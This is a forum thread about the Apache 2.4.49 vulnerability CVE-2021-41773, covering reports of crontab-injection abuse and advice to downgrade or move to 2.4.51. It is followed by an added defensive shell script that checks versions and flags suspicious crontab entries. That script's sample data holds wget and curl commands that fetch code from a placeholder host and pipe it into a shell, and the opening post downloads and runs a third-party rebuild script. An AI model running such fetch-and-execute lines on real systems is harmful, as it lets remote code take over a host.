Topic: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773

Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« on: October 06, 2021, 11:38:13 AM »
Apache 2.4.49 has a security problem.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

Update to 2.4.50 or downgrade to 2.4.48 is recommended.

What is the best way to update apache?

Can CWP team provide an update script?

On external sites there are tutorials for this update:
cd /usr/local/src
rm -rf /usr/local/src/apache*
wget --no-cache https://www.mysterydata.com/upload/apache-rebuild.sh
yum install uuid uuid-devel -y
chmod 755 apache-rebuild.sh
sh apache-rebuild.sh


In my opinion it would be better if the Apache update were supported by the CWP forum.


Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #1 on: October 06, 2021, 01:46:26 PM »
Yes, I also got a similar notification from my VPS today.
In my opinion it is also the best solution to wait for the CWP upgrade team for cwp-httpd 2.4.50. I hope it will be soon, in a day or two.
« Last Edit: October 06, 2021, 01:49:27 PM by idovecer »

Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #2 on: October 06, 2021, 06:23:33 PM »
Waiting is not an option.
I saw abuse of the vulnerability in the wild (injection lines in nobody's crontab trying to download Multi-Vector Miner+Tsunami Botnet).
So I shut down Apache and downgraded to 2.4.48.

So CWP: please update fast.

Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #3 on: October 06, 2021, 06:33:42 PM »
The CWP update has the downgrade to 2.4.48, so simply run the update or wait to get updated.
Code:
/scripts/update_cwp

Re: Vulnerability apache 2.4.49 || (NVD)CVE-2021-41773
« Reply #4 on: October 09, 2021, 06:13:06 AM »
Changing to Apache 2.4.50 does not solve the problem.
You have to update to 2.4.51.
You can do that by changing the version number at line 8 in the script in the first comment here.

The only thing that script does is recompile Apache from source. So, it would be stupid to downgrade to a lower version.
« Last Edit: October 09, 2021, 06:21:09 AM by bartje1974 »
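
The following is an added example, not code from any poster or from CWP: shell helpers that classify an Apache version using the cut-offs given in this thread (2.4.49 and 2.4.50 need action, 2.4.51 is the target) and flag crontab lines of the kind Reply #2 describes. The function names and the sample crontab are constructed for illustration, and the commented usage assumes `httpd` is on the PATH.

```shell
#!/bin/sh
# Added example (not from the thread): triage helpers for the versions
# and the crontab symptom the posters describe.

# Classify an Apache version. Accepts a bare version ("2.4.49") or the
# "Server version: Apache/2.4.49 (Unix)" line printed by `httpd -v`.
classify_httpd_version() {
    ver=$(printf '%s\n' "$1" | sed -n 's|.*Apache/\([0-9][0-9.]*\).*|\1|p')
    [ -n "$ver" ] || ver=$1
    case "$ver" in
        2.4.49|2.4.50) echo "affected" ;;   # 2.4.50 does not solve it (Reply #4)
        2.4.*)
            patch=${ver#2.4.}
            case "$patch" in
                ''|*[!0-9]*) echo "unknown" ;;
                *) if [ "$patch" -ge 51 ]; then echo "fixed"; else echo "older"; fi ;;
            esac ;;
        *) echo "unknown" ;;
    esac
}

# Read a crontab on stdin and print non-comment lines that download
# content (curl/wget) or pipe something into a shell.
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' |
        grep -E '(^|[^[:alnum:]_])(curl|wget)[[:space:]]|\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Constructed sample crontab (203.0.113.0/24 is a documentation range).
SAMPLE_CRON='# constructed sample, not taken from a real host
0 3 * * * /usr/bin/find /tmp -type f -mtime +7 -delete
* * * * * wget -q -O - http://203.0.113.10/placeholder.sh | sh
*/5 * * * * curl -fsSL http://203.0.113.10/placeholder | bash'

# Demo on constructed input. On a live host, feed the real values:
#   classify_httpd_version "$(httpd -v | head -n 1)"
#   crontab -l -u nobody | suspicious_cron_lines
for v in "Server version: Apache/2.4.49 (Unix)" 2.4.50 2.4.51 2.4.48; do
    printf '%s -> %s\n' "$v" "$(classify_httpd_version "$v")"
done
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron_lines
```

A hit from `suspicious_cron_lines` is a prompt to inspect the entry by hand; legitimate jobs that use curl or wget will also match.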